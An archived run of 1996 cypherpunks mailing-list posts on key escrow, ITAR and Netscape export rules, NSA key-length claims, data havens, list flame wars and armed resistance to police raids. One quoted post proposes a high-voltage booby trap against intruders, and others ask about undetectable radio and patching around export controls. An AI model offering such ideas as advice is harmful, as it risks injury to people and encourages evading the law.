Sources said the US were willing to "use" the OECD as a "policy laundering"
machine : to pressure the organisation in order to have the key escrow
policy approved by the 24 countries. US intelligence officials would have
been using it as a political weapon at home, where Congress,
public-interests groups and industry pressure groups are on the verge to
act against any key-escrow policy.

     *     *     *     *     *     *     *     *

**LAMBDA SPECIALS -- WEB ONLY!!! - see www.freenix.fr/netizen**

Forget the Internet. Here are some subversive archives. Unfortunatly,
mainly in French.

-->> Coca-Cola's weird business strategy during WW2. (You won't heard this
story during 1996 Olympics). Based on a book published in 1993, "For God,
Country and Coca-Cola, by Mark Pendergrast (Scribner's Sons Publishing, New
York). From the Berlin Olympics to 1945, Coca-Cola builded a strong
presence in Germany while sitting besides GI's in the Us War effort.
Check interesting pictures taken from the book:
>> www.freenix.fr/netizen/special/coca-colabo.html
-->> Special Psychedelics
French stories about the renewal of medical psychedelic research. And a
letter from Tim Leary, psyche pope of the 60's, published in English.
>> www.freenix.fr/netizen/special/tl-letter.html

     *     *     *     *     *     *     *     *

Jerome Thorel =-= Journaliste/Free-lance Reporter =-= Paris, France
   =+= the lambda bulletin --> http://www.freenix.fr/netizen =+=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 20 Jul 1996 12:28:42 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Kellstrom Calls for DT Funding
In-Reply-To: <2.2.32.19960719183314.00847ac0@panix.com>
Message-ID: <199607200149.VAA19633@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> In a "briefing" on TWA 800 when one of the reporters tossed Big Jim
> Kellstrom (Deputy Director in Charge of the New York Office) of the FBI a
> softball question about what he needed to fight terrorism; he took the
> opportunity to call for full funding of the Digital Telephony Bill.  He said
> the usual about how bad guys conspire and we need to tap.
> 

Not it was his baby all the way, hence his personal interest....

 


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 20 Jul 1996 20:50:23 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <199607192000.WAA26326@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Sternlight blathered [regarding Tim]:

...

>"Nyaah, nyaah, you can't catch me" doesn't mean that if they do they won't
>prosecute. Your waving around that stuff in France is not only juvenile,

Starting off with defamation is a sure tipoff that what follows is crap.
And sure enough...[he sure makes it convenient for sarcastic "cowards"
like me to use his own words against him.]

>but also may put you in violation of French crypto law. ...

Perry's right, DS *would* do it with a dawg.

>>... Borders _are_ transparent. ...

>
>Again you make the long-discredited straw man argument that the purpose of
>ITAR is to hermetically seal. It is not. It is to keep legitimate US mass
>market purveyors from selling strong crypto overseas, ...

You tell the stated purpose, the NSA's own lawyers have told PRZ and others
(off the record, of course) that there is a domestic (and therefore a Constitutionally impermissible) purpose. Read the Bill of Rights.

>[yadda yadda yadda.]
>>
>>_This_ is why I expect the Netscape beta to arrive overseas pretty soon.
>
>Nobody disputes that. It won't be readily available though, except for
>those who have no compunctions about software piracy.

Hell, they can pay Netscape anonymously. David, if you try double standards
around here any more, I will make fun of you more, EVERY TIME.

I will not stop. I note that you have the common [but not necessarily fucking]
statist flaw of needing to get in the last word in every argument, rather than
just agreeing to disagree. Chill out. For the health of the list, please try 
to tone down the volume and number of your posts to something more closely
approaching reasonable.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 20 Jul 1996 14:17:19 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids (fwd)
Message-ID: <199607200300.WAA27723@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
> Date: Fri, 19 Jul 1996 20:34:34 -0500 (CDT)
> From: ichudov@algebra.com (Igor Chudov @ home)

> It the voltage is 10000 volts, it is always fatal, right? And if you set
> good enough resistors, then the voltage for the human body itself would
> be much less than 10000V -- most of the voltage will be taken by resistors
> themselves.

It depends on several things. It is possible using the right combination of
frequency and voltage (ie Tesla Coil) to have literaly millions of volts
running over your body with no effect. There is an effect of electricity,
The Skin Effect, where as the frequency and voltage rise the actual flow of
electrons moves to the outer surface of conductors. There is little or no
rf current flowing in the center of the wire.


                                                     Jim Choate








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 20 Jul 1996 13:59:15 +0800
To: cypherpunks@toad.com
Subject: RE: Inventor of radio... (fwd)
Message-ID: <199607200304.WAA27741@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Gregory Ellison <gregorye@microsoft.com>
> Subject: RE: Inventor of radio...
> Date: Fri, 19 Jul 1996 12:02:00 -0700
> 
> I've heard this decision referred to many times but have been unable to
> locate any specifics.  Can anyone provide a pointer?

You should be able to find it via the patent office webpage. I believe the
year was 1985, but I could be wrong.

                                           Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 19:18:02 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760eae159927b241@[192.187.162.15]>
Message-ID: <v03007600ae161ad816f6@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:25 PM -0700 7/19/96, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Fri, 19 Jul 1996, David Sternlight wrote:
>
>> At 1:47 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:
>>
>> >Allow the government to think that we think it has the right to give
>> >us their permission and we've lost everything.  The government should
>> >need OUR permission, not the other way 'round.
>>
>> ...This is a (as far as it goes) a democracy, not a 'Llewyellyn
>> and those who agree with him' dictatorship.
>
>Actually, for what it's worth, this (meaning the US) is a
>Constitutionally limited democratic republic, NOT a dictatorship
>of the majority, the proletariate, etc.  That has been tried and
>failed too many times to mention.  Read the Ninth and Tenth
>Amendments to the Constitution for further enlightenment.

I've been around for so long that I knew when I typed the above someone
would try to take my words literally in order to avoid my point and pick
the above nit. My point stands--this is not a 'whoever and those who agree
with him' dictatorship. The administration has the legislative permission
the Constitution provides for through our elected representatives, and a
few who disagree have no standing to say that the government should ask
their permission yet again.

If they disagree with what Congress and the administration have done, there
are well-established ways to petition Congress to change it. If they fail,
t.s.--that's the way our system works. YOU don't get to force your will on
the wider population, nor do YOU get to tell them that they are poor
benighted fools who should agree with YOUR views on civil liberties. To
assert otherwise is fascism, authoritarianism, dictatorship, pick one.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 20 Jul 1996 12:39:26 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <199607191255.IAA00550@jafar.issl.atl.hp.com>
Message-ID: <Pine.SV4.3.91.960719222009.17923D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


What does this Sternlight guy do for a living?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sat, 20 Jul 1996 20:12:01 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced  Ninja Raids)
In-Reply-To: <199607192139.OAA23712@server1.chromatic.com>
Message-ID: <Pine.SUN.3.95.960719221429.4919D-100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain


	Ernest.

On Fri, 19 Jul 1996, Ernest Hua wrote:

> > in a country where everybody  << including six year olds >>
> > carry, and can use Uzi's, etc, as a matter of course.
> Oh my ... you aren't serious, are you?

	Deadly.

> Just why do you suppose a pissed-off six-year-old (because, let's say,
> another six-year-old stole his lunch) would not blast someone?

	I can only assume that
	#1:	You've never lived where both long arms, and side 
		arms were a part of normal casual dress attire. 
	#2:	You have no comprehension of non-wasp culture norms.
	
> Would you just hand out guns to all teenagers?

	I'd expect them to buy the guns, but yes.

> friends) were 6 (or 12 or even 18), our primary concern was having fun,
> avoiding stuff we don't like (like homework), attracting females (or

	Lot like mine.  

	Thing was, without the FN's, or the Uzi's there wouldn't 
	have been a childhood to grow out of. 
> By the way, would you let a 6 year old drive?  or fly?  (Assuming that
> they are physical capable and trained to do such.)

	Yes.

        xan

        jonathon
        grafolog@netcom.com


	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 20 Jul 1996 12:35:40 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: take the pledge
In-Reply-To: <199607191606.MAA04690@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960719222636.17923E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Look, folks, we all know that 99% of what David Sternlight posts is
> garbage. Why don't we all pledge not to answer any of his posts, and
> then he'll go away.

   Thanks Perry for a great idea. Add my name to the list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 18:01:09 +0800
To: cypherpunks@toad.com
Subject: Re: take the pledge
In-Reply-To: <199607191606.MAA04690@jekyll.piermont.com>
Message-ID: <v03007603ae1620074ea5@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


>> Look, folks, we all know that 99% of what David Sternlight posts is
>> garbage.

Perry is notorious for posting garbage and the above mote in his own eye is
a prime example. 99%? Let's see some data and specifics. I'm always willing
to discuss substantive disagreements, presented civilly.

It's pathetic that Perry, can't even make a rational counter-argument but
has to resort to unsupported defamation.

>Why don't we all pledge not to answer any of his posts, and
>then he'll go away.

Nobody compels you to answer any of my posts. Calling for a "pledge" and an
organized boycott suggests you are afraid people won't agree with you
without trying to make it "politically correct" to do what YOU want. Some
freedom-lover you are.

The truth is none of my points have been refuted by you, and being unable
to deal with rational critical comment, you resort to this.

Go for it. I won't mind, and the noise level will go way down, especially
among the defamers, who don't respond with much substance anyway.

David









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Sat, 20 Jul 1996 15:31:45 +0800
To: "'cypherpunks@toad.com>
Subject: RE: NSA response to key length report
Message-ID: <01BB75C4.B64C15A0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



What I don't get is why the "report" is so semi-literate? The grammar 
errors are curious given the supposed source; it even makes me a little 
skeptical as to the source.

My take on the bit about "high processing speeds -> I/O bound" isn't that 
they're talking IPC, but bus timing (??)
I don't have the original paper handy and I don't recall what the proposed 
processor speeds are.

"Total exhaust time"  --- is this truly as meaningless as it sounds?

----------
From: 	Matt Blaze[SMTP:mab@crypto.com]
Sent: 	Friday, July 19, 1996 2:10 PM
To: 	Ernest Hua
Cc: 	cypherpunks@toad.com
Subject: 	Re: NSA response to key length report

Ernest Hua <hua@xenon.chromatic.com> writes:
>
> It sounds like most of their "counter-arguments" are just stalling 
tactics.
>
> If you are a lawyer for someone you know is guilty, you still would 
choose
> to find every reason in the book to attack the prosecution's case.  Here 
we
> have precisely the same effect with the NSA.  Any tactical manuveur to 
keep
> stalling the impending collapse of ITAR.
>
> (It is human .. er .. rather .. bureaucrat-esque to claim innocence in 
the
> face of overwhelming evidence of guilt.)

Particularly impressive is that our key length report was hardly
above criticism from several angles, but their rebuttal managed
somehow to avoid them.

What I find most disturbing about this is that their report was
provided secretly to policymakers in the administration and in
Congress, without independent technical review that would have
quickly exposed the fallacy of the arguments.  I never would have
seen it had several of the recipients not faxed it to me.  This is
the first hard evidence I've seen of NSA providing anything less
than the highest quality technical analysis to other parts of the
government.  A non-specialist reader would be easily misled by the
technically dense, but completely irrelevant, "rebuttal".  It smacks
of either ill-informed sloppiness, or, perhaps worse, self-serving
disingenuous cynicism.  Either conclusion is scary, and, to me in
fact, quite surprising.

-matt








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 20 Jul 1996 13:09:18 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Responding to Pre-daw
In-Reply-To: <199607192233.PAA24315@server1.chromatic.com>
Message-ID: <Pine.SV4.3.91.960719224656.17923F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, Ernest Hua wrote:

> Worse yet, the bureaucrats, whose asses are on the line when a tragic mistake
> occurs

     which planet are you talking about, Ernest?

Ernie, you figure any FBI folks are going to get disciplined for illegally 
giving files to the White House?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 16:27:53 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <ae1574dc100210047571@[205.199.118.202]>
Message-ID: <v03007605ae1623952449@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM -0700 7/20/96, Timothy C. May wrote:
>At 6:42 AM 7/19/96, snow wrote:
>>On Thu, 18 Jul 1996, Doug Hughes wrote:
>>
>>> If people break into my house with the element of surprise wearing
>>> all black in the middle of the night, they have the element of surprise
>>> FIRMLY on their side.. I'd have to believe that reaching for a gun
>>> was the most stupid thing I could do in the entire world in this sort
>>> of circumstance.
>>> "You'd be right, but you'd be dead" - Dr. SNMP
>>>  If you don't reach for a gun, at least you have the 'chance' for
>>> restitution on your side. If you're dead, you have no options.
>>
>>     If you are trained a certain way, you _are_ going to reach for
>>a weapon, and hell, at least then my kid will have enough money to go to
>>whatever college she wants.
>
>Snow is absolutely right! Surprised in the night, with no clear
>identification of the entrants (and yelled "Police!!" claims are used by
>home invaders, so I would not trust this anyway), a trained person will
>instinctively reach for his weapon.
>
>I again ask what was so wrong with the "You are surrounded. Come out with
>your hands up." routine of years past.

Probably something to do with flushing dope down the toilet, or destroying
evidence. Perhaps it's too much to expect them to disconnect the sewer line
and hit your interior with a water hose and an electricity cut-off before
raiding it.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 20 Jul 1996 17:14:45 +0800
To: "cypherpunks" <dfloyd@IO.COM>
Subject: Re: Opiated file systems
Message-ID: <199607200558.WAA12898@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Jul 96 22:31:16 -0800, dfloyd@IO.COM wrote:

>> A) Only accept files with valid PGP signatures from accepted keys - this
>> is one area where PGP's commandline interface is a plus - just write a
>> batch script. Demand that a separate file be sent first, signed by a
>> certain key. This file would contain valid filenames for the rest of the
>> session. If a non-listed file is sent, kill the session.  This could all
>> be automated with a simple program. You could probably even use SSLs and
>> similar to do it on a website if you could swill the PGP bit - maybe a
>> plugin?
>
>This defeats the purpose of the data haven.  If I did stuff like that,
>then why not use McAffee's WebStor, where you FTP files over to your
>personal "vault"?

What I was trying to propose was that you provide a key for usage when
they first initiate usage of your site. They could then use that key to
send stuff to you. Neither party needs to know who the other person is,
merely that he is using the agreed upon key. This would let you revoke
the keys of offenders.

>> B) bounce trash back.
>
>If someone is shipping through a remailer, how would that help?

I'm assuming most remailers allow 2 way traffic. Alternately, just send
email to the remailer operator. Rather than get spammed by the
bounceback, he would probably block that site from sending to you... (Or
revoke their account entirely)


>I plan to make this as anonymous as possible.  Reason?  Everything else is
>just posing.  I was intending this to be a place that one could be assured
>of anonymity -- the data haven doesn't even know if the user can use PGP.

I was using PGP as an example. If you really want portable, use that Java
PK library and write a custom frontend for it.  You just need to use an
agreed upon key for verification. Now, if they wanted, a secure method
might be using PK-aware remailers - pk channel from you to remailer,
using your keys, pk channel from remailer to them, using their keys. This
would let you exchange a key securely... Of course, it would involve
trusting the remailer operator, but you'd have to do that anyway.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 20 Jul 1996 16:24:41 +0800
To: alt.security.pgp@myriad.alias.net
Subject: The PGP keyserver at jpunix.com
Message-ID: <Pine.NEB.3.93.960719230030.4135B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The PGP keyserver at jpunix.com is temporarily shut down due to technical
difficulties. For some reason, it won't process keys without failing. I
suspect a corrupted keyring. I'm expecting to FTP a new master keyring
shortly. Please be patient and I apologize for any inconvenience.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfBasVOTpEThrthvAQGffwP/f1PuovMRixg58kFedhDQ8+ioX4MMgYo+
AKi0wK2TW10iswaqLm6Q2CV0rh+D2p2Ao8SgYaxoCV8qNgF+qssx8B84zKeq8xWI
gGtX3qPhW1VCcyv6czCP+F2QOtmxPquHDhis62XMeI4RoFMj20fdcmTycHEQAZZp
CflWX30YH5Q=
=ZX9n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 20 Jul 1996 22:23:26 +0800
To: Vinnie Moscaritolo <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <1.5.4.32.19960719172155.002fe578@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


I must admit all this talk about what kinds of bullet best
penetrates Kevlar makes me 
shake my head and wonder what's happening to the world --
particularly since you are
far more likely to use this weaponry in a rage against a loved one than against 
someone breaking down your door. The "good" guys arming
themselves so that the "bad"
don't invade reminds me of the stupid arms race between the US
and the Soviets: I
wonder how many burglars in Western Europe carry guns -- in the US, you'd 
be real stupid if you didn't carry the latest weaponry.

More to the point as far as this list is concerned,  Vinnie pointed out:

>hmm imagine what  Waco would have been like if the Branch Davidians:
>
>1) were not morons.
>2) knew how to use the news media
>3) had redundant, spread spectrum, satilite, and underground comms into the
>net.
>
>This equals instant net coverage, to rival CNN. It makes for a hard
>target.Armed with your Militia-Mailer(tm) the strong crypto edition and
>live video, these folks would never consider getting near you.

Are there good books (or even better, sources on the net) that
would teach you how to
set up and use spread spectrum and other communication technologies without easy
detection? In India, the government controls most of the
spectrum, and hardly allows
the use of radio. However, spread spectrum is likely to be used
for wireless local loop, 
and it would be harder for them to figure out that you are
engaging in unauthorised 
communication if you use similar frequency bands as the local telecom provider.

>A better approach is to disarm and expose these bozos for what they are,
>and for christ sakes get out there and VOTE... dammit... and get your
>friends to VOTE..

I wonder about that -- between Tweedledee Clinton and Tweedledum
Dole, does it matter whether you vote or not? The system seems to
make sure that before you even get to a
position where someone can seriously vote for you, you've already
sold your soul.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Your_Pal@IConNet.COM
Date: Sat, 20 Jul 1996 15:30:51 +0800
To: cypherpunks@toad.com
Subject: WORD Mail: A Part of Our Lives...
Message-ID: <199607200324.XAA17883@icon35.iconnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 

 It's our birthday. Come blow out the candles at
 <URL:http://www.word.com>.
 
 Love,
 
 The Word Staff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Myers <blackavr@aa.net>
Date: Sat, 20 Jul 1996 18:33:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: High Voltage Management
Message-ID: <2.2.32.19960720063533.007255cc@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:30 AM 7/20/96 -0700, Timothy C. May wrote:

>volt Van de Graaf generators. (By the way, the neon sign transformer was
>actually pretty dangerous, and my handling of it was careless, I now see.
>Be careful when you convert one of these into a Jacob's Ladder, or use it
>for plasma studies.)

Been there. Done that. Bad idea to have the Jacob's Ladder out as 
"atmosphere" for a party, especially one where alcohol is available...

"Hey, that's pretty cool...what is it?"
"It's a Jacob's Ladder...careful...it's hot."
(Time passess...Darwin and Jack Daniels intervene)
BZZZZZT! "Yeow! That thing burned me!"
"Well, what were you doing?...I told you it was hot!"
"Uh...I was trying to light my cigarette on it."

--
/^^^^^^^^^Instead of being born again, why not just GROW UP?^^^^^^^^^^^\
Michael Myers                   Vote Libertarian....you'll sleep better!
Don't like abortion? Don't have one.     Don't like guns? Don't buy one.
blackavr@aa.net                          E-mail for PGPv2.6.2 public key
\____________ http://www.aa.net/~blackavr/homepage.htm ________________/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 20 Jul 1996 18:33:34 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Netscape download requirements
Message-ID: <199607200634.XAA15478@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:44 AM 7/19/96 -0400, Peter D. Junger wrote:
>(I do want to thank Netscape--and especially Tom Weinstein who tried
>to give me a lot of assistance--for making the downloading possible.
>On the other hand, I certainly don't think that we owe any thanks to
>the government agencies that made all this rigamarole necessary.)

I echo Peter's thanks.  Netscape is helping us demonstrate a market for
strong, non-GAKed crypto.  This market exists in spite of what the GAK fans
say.

If the American people carefully considered the issues of GAK, I strongly
believe they would come down on the side of privacy, and not on the side of
total government access to communication.  That is why our government is
trying so hard to institute GAK thru international treaty, the path with
the least public input and scrutiny.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 20 Jul 1996 18:21:56 +0800
To: "cypherpunks@toad.com>
Subject: RE: MSNBC and cookies
Message-ID: <01BB75CB.92B27380@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Hal

I find that MSNBC is now working OK without cookies. I tried off and on
during the day today (Friday) and last night and it didn't work, but it
is working OK now.  I can get in with lynx or with my cookie-blocked
Netscape.  I sent them a nasty letter this afternoon complaining about it
so either that may have helped or it is obsolete.  Maybe it was just a
glitch?
......................................................................


I think that's probably what it was  --  they also had some initial problems with the cable broadcast.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 20 Jul 1996 19:28:08 +0800
To: Ernest Hua <grafolog@netcom.com>
Subject: Re: Giving 6 year old kids Uzi's
Message-ID: <199607200649.XAA25479@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:39 PM 7/19/96 -0700, Ernest Hua wrote:
>You might have had a different childhood, but when I (and most of my
>friends) were 6 (or 12 or even 18), our primary concern was having fun,
>avoiding stuff we don't like (like homework), attracting females (or
>males, as the case may be), attracting attention in general, avoiding
>being one-upped (in conversation or in sports or otherwise) but always
>on-upping someone else, ...

When I was in high school (age 14-18), I was on the high school rifle team.
 That means I carried a rifle into school at the beginning of the season
and back home at the end of the season.  I should not be necessary to
mention it, but I never shot anyone then, before, or since.


>Incidentally, if you are interested, I DO have a child (almost 2 yrs),
>and I certainly would not even contemplate letting him have a gun (no
>matter how well he can use it) until he can legal get one himself.  I
>will certainly invoke serious wrath (on him and anyone else involved)
>if I ever found him with a gun.


I have two children, ages 20 and 24.  We never gave them toy guns.  (Guns
are serious things.  If you want toys, spend your own money.)  However, we
did give them the opportunity to learn about and shoot real guns when they
were quiet young.  I first shot a rifle at age 8 at summer camp.  I
recommend teaching children about proper use of guns at a similar age, with
tight supervision.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 20 Jul 1996 22:42:08 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
Message-ID: <1.5.4.32.19960719222040.008f8914@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


Why can't anybody in US write a little program that compares the two 4.5 meg
install files and make a patcher? (It seems simple to do, is very
inconspicuous and of course does not violate the ITAR - although it might
violate some copyright stuff, but hey, whos willing to enforce something
like that, when it's anonymously posted or mailed)

I suppose the difference will be small, if one consideres an offset after
the alternative parts (something like:

generalgeneralgeneralUSUSUSUSUSUSUSUSgeneralgeneral and
generalgeneralgeneralWORLDWORLDgeneralgeneral

remo
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dmitri Chesnokov <chesnok@manifold.algebra.com>
Date: Sat, 20 Jul 1996 19:14:09 +0800
To: cypherpunks@toad.com
Subject: Thanks to Prof. Sternlight for postings to CYPHERPUNKS
Message-ID: <199607200538.AAA07597@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


> > Look, folks, we all know that 99% of what David Sternlight posts is
> > garbage. Why don't we all pledge not to answer any of his posts, and
> > then he'll go away.
> 
>    Thanks Perry for a great idea. Add my name to the list.

It is not surprising that some members of cypherpunks mailing list
failed to answer well-reasoned arguments of Prof. Sternlight. It is sad
but not at all unexpected that some of us resorted to ad hominem attacks
and attacked the person of Prof. Sternlight instead of trying to refute
his arguments.

It is reprehensible that after the ad hominem attacks failed to silence
a progressive and socially-responsible scientist such as David, the same
people are desperately trying to organize a boycott of his postings.
This boycott and fake "pledges" IMPOSED on members of Cypherpunks list
by those who were thought to have AUTHORITY on this list are contrary to
the notion of freedom of speech.

Dr. David Sternlight is undoubtedly one of the best experts in
cryptography and Government Information Policy, who is generous enough
to share his observations with us. We should thank you, David, for
taking your time and helping Cypherpunks to reach new heights in our
understanding of what should be the proper role of the government.
Please continue posting to our mailing list. There are people who are
interested in your views!

We have seen how so called "scientific establishment" on usenet -- a bunch
of "physicists" not known for anything but their intolerance to novel
ideas -- tried and failed to silence Prof. Archimedes Plutonium. A real
tragedy was prevented by a small number of freedom lovers like myself
who supported Archimedes in his tough times.

Protect freedom of speech! Do not let evil libertarians silence an
opposition scientist!

Dmitri Chesnokov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Sat, 20 Jul 1996 16:32:31 +0800
To: lindat@iquest.net
Subject: Crim Law Message Board
Message-ID: <960720010442_580798506@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Criminal defense attorneys are welcome to use the new message board located
at the web site maintained by the Association of  Federal Defense Attorneys
(AFDA), located at

http://www.afda.org

The message board was installed on Friday, July 19, and it's there to serve
the interests of the defense community.  The board should be used strictly
for professional purposes, to exchange ideas on the law, ask colleagues for
input on strategies, share views or inquire about government agents and
witnesses, and so forth.  No personal or social conversation, please.

You are also welcome to join AFDA online by clicking the "Join AFDA" bar on
the home page of the web site.

System Operator
email to: Operator@afda.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Sat, 20 Jul 1996 16:31:28 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200036.RAA15172@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960720010145.27788A-100000@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 19 Jul 1996, jim bell wrote:

> 
> I've had a substantially better idea.  Hang carbon-fiber bundles from the 
> ceiling, which are charged to about 10,000 volts when an intrusion is 
> detected.  They'll glom onto anything conductive within their range, and 
> anyone with the bad fortune to be breaking into the house at that moment 
> _might_ live to regret it.  (resistors could be added to limit the current 
> to non-fatal but exceedingly painful levels.

Cutting off the power supply would render this method useless very
quickly. Oh, so you are going to use batteries? That "when an intrusion is
detected" part sounds rather interesting... Wouldn't be too hard to either
befuddle.

The point is:
	- You cannot be alert at all times.
	- Even if you can, you cannot cover all possibilities with a 100%
	ensurance of safety.

IOW, if a 'pre-dawn unannounced ninja raid' [sic] occurs on you, you are
pretty well beat, if only because the other side knows what they are doing
and you have no idea of their plans.

The only protection against lawlessness is not lawlessness, it is reason.

- -- Elliot

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

